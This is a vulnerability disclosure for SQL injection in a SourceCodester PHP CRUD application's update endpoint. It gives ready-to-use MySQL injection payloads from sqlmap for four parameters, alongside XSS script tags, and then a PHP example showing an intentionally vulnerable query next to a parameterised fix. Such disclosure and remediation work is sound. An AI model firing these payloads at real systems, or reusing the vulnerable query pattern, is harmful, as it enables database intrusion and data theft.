Submit #403662: SourceCodester PHP CRUD using PDO Connection 1.0 SQL Injection

Title: SourceCodester PHP CRUD using PDO Connection 1.0 SQL Injection

Description:
I would like to report a SQL injection vulnerability I discovered in the SourceCodester PHP CRUD using PDO Connection with Free Source Code during my testing.

Details:
Affected URL/Endpoint: /basic-crud/endpoint/update.php
Vulnerable Parameter: tbl_person_id, first_name, middle_name, last_name
Risk Level: High (allows malicious users to execute arbitrary SQL queries)

Steps to reproduce:
1) Click on update.
2) Use a proxy like Burp Suite to intercept the "update" request.
3) Input the payload to invoke the SQL injection.
---
table=tbl_person&tbl_person_id=3+%27+AND+GTID_SUBSET%28CONCAT%280x716a766a71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29+AS+NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x717a6b6271%29%2C7770%29--+kDOW&first_name=test&middle_name=test&last_name=test
---
4) It is also vulnerable to the following attacks, as found by running sqlmap on it.
---
Parameter: tbl_person_id (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: table=tbl_person&tbl_person_id=3 ' AND EXTRACTVALUE(7279,CASE WHEN (7279=7279) THEN 7279 ELSE 0x3A END)-- fMxp&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: table=tbl_person&tbl_person_id=3 ' AND GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(8583=8583,1))),0x717a6b6271),8583)-- kDsX&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: table=tbl_person&tbl_person_id=3 ';SELECT SLEEP(5)#&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: table=tbl_person&tbl_person_id=3 ' AND (SELECT 5533 FROM (SELECT(SLEEP(5)))GxuT)-- zeFA&first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

Parameter: last_name (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' AND EXTRACTVALUE(4540,CASE WHEN (4540=4540) THEN 4540 ELSE 0x3A END)-- tzjN

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(7214=7214,1))),0x717a6b6271),7214)-- hAUA

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>' OR (SELECT 3365 FROM (SELECT(SLEEP(5)))ypJz)-- mXnd

Parameter: middle_name (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' AND EXTRACTVALUE(7947,CASE WHEN (7947=7947) THEN 7947 ELSE 0x3A END)-- JoZH&last_name=<script>alert(3)</script>

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(8199=8199,1))),0x717a6b6271),8199)-- IkLT&last_name=<script>alert(3)</script>

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>';SELECT SLEEP(5)#&last_name=<script>alert(3)</script>

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>&middle_name=<script>alert(2)</script>' OR (SELECT 5068 FROM (SELECT(SLEEP(5)))sPQa)-- AZRO&last_name=<script>alert(3)</script>

Parameter: first_name (POST)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' AND EXTRACTVALUE(7800,CASE WHEN (7800=7800) THEN 7800 ELSE 0x3A END)-- TEHG&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: error-based
    Title: MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' OR GTID_SUBSET(CONCAT(0x716a766a71,(SELECT (ELT(3697=3697,1))),0x717a6b6271),3697)-- gmpZ&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>';SELECT SLEEP(5)#&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: table=tbl_person&tbl_person_id=3 &first_name=<script>alert(1)</script>' OR (SELECT 9947 FROM (SELECT(SLEEP(5)))oVQD)-- EFpm&middle_name=<script>alert(2)</script>&last_name=<script>alert(3)</script>
---
Please let me know if you need further information or a more detailed analysis.
User: Delvy (UID 74555)
Submission: 09/06/2024 01:06 PM (10 months ago)
Moderation: 09/06/2024 11:36 PM (11 hours later)
Status: Accepted
VulDB Entry: 276784 [SourceCodester PHP CRUD 1.0 /endpoint/update.php tbl_person_id/first_name/middle_name/last_name sql injection]
Points: 17
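The report above describes four POST parameters of update.php reaching the UPDATE statement unescaped, with the table name itself also coming from the request. The following PHP is an added example, not code from the SourceCodester project or from the submitter: it assumes update.php builds an UPDATE for a PDO connection from $_POST['table'], $_POST['tbl_person_id'] and the three name fields, shows the assumed vulnerable shape beside a hardened version, and uses placeholder connection details and a hypothetical ALLOWED_TABLES allow-list.

```php
<?php
// Added example (not the project's own update.php). Assumptions: the handler
// reads table, tbl_person_id, first_name, middle_name and last_name from the
// POST body and issues one UPDATE over a PDO/MySQL connection. DSN and
// credentials below are placeholders.
declare(strict_types=1);

function connect(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=db_crud;charset=utf8mb4', 'user', 'password', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepared statements: bound values never become SQL text,
        // and the server accepts only a single statement per prepare.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// ASSUMED VULNERABLE SHAPE: every request value, including the table name and the
// id in the WHERE clause, is spliced into the query string. A quote in any of the
// four reported parameters ends the string literal and the rest is parsed as SQL.
function updatePersonVulnerable(PDO $pdo, array $post): int
{
    $sql = "UPDATE {$post['table']} SET first_name = '{$post['first_name']}', "
         . "middle_name = '{$post['middle_name']}', last_name = '{$post['last_name']}' "
         . "WHERE tbl_person_id = '{$post['tbl_person_id']}'";
    return (int) $pdo->exec($sql);
}

// HARDENED: identifiers come from a fixed allow-list (placeholders cannot bind a
// table name), the id is validated as an integer, and all values are bound.
const ALLOWED_TABLES = ['tbl_person' => 'tbl_person'];   // hypothetical allow-list

function updatePersonSafe(PDO $pdo, array $post): int
{
    $table = ALLOWED_TABLES[$post['table'] ?? ''] ?? null;
    if ($table === null) {
        throw new InvalidArgumentException('unknown table');
    }

    // Reject anything that is not a plain integer before it gets near the SQL.
    $id = filter_var($post['tbl_person_id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        throw new InvalidArgumentException('tbl_person_id must be an integer');
    }

    $stmt = $pdo->prepare(
        "UPDATE {$table} SET first_name = :first, middle_name = :middle, last_name = :last "
      . "WHERE tbl_person_id = :id"
    );
    $stmt->bindValue(':first',  (string) ($post['first_name']  ?? ''), PDO::PARAM_STR);
    $stmt->bindValue(':middle', (string) ($post['middle_name'] ?? ''), PDO::PARAM_STR);
    $stmt->bindValue(':last',   (string) ($post['last_name']   ?? ''), PDO::PARAM_STR);
    $stmt->bindValue(':id',     $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed request: the id carries a stray quote like the report's step 3, and a
// name field carries a legitimate apostrophe. The safe path refuses the id before
// any SQL is sent; the vulnerable path would have spliced it into the WHERE clause.
$constructedPost = [
    'table'         => 'tbl_person',
    'tbl_person_id' => "3 '",
    'first_name'    => 'test',
    'middle_name'   => 'test',
    'last_name'     => "O'Brien",
];

try {
    $pdo = connect();
    echo updatePersonSafe($pdo, $constructedPost), " row(s) updated\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
} catch (PDOException $e) {
    // Log the detail server-side; return a generic message so error-based techniques
    // such as the GTID_SUBSET/EXTRACTVALUE probes in the report get nothing to read.
    error_log($e->getMessage());
    echo "database error\n";
}
```

Two points from the sqlmap output above drive the design: the error-based and boolean-based findings depend on the raw MySQL error text reaching the HTTP response, so exceptions are logged rather than echoed; and the stacked-query finding (`';SELECT SLEEP(5)#`) is closed both by binding values and by disabling emulated prepares, since a native MySQL prepared statement carries exactly one statement.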
